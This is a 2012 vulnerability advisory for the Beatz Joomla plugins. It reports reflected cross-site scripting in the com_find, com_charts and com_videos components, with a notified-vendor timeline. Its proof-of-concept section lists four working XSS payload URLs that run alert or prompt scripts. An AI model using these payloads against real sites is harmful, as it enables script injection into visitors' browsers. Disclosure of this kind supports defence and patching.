1. OVERVIEW
Beatz 1.x versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.
4. VERSIONS AFFECTED
Tested in 1.x versions
5. PROOF-OF-CONCEPT/EXPLOIT
== Generic Joomla! 1.5 Double Encoding XSS
http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
== com_charts (parameter: do)
http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
== com_find (parameter: keyword)
http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
== com_videos (parameter: video_keyword)
http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
6. SOLUTION
The vendor hasn't released the fixed yet.
7. VENDOR
Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-03-01: notified vendor
2012-04-15: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
#yehg [2012-04-15]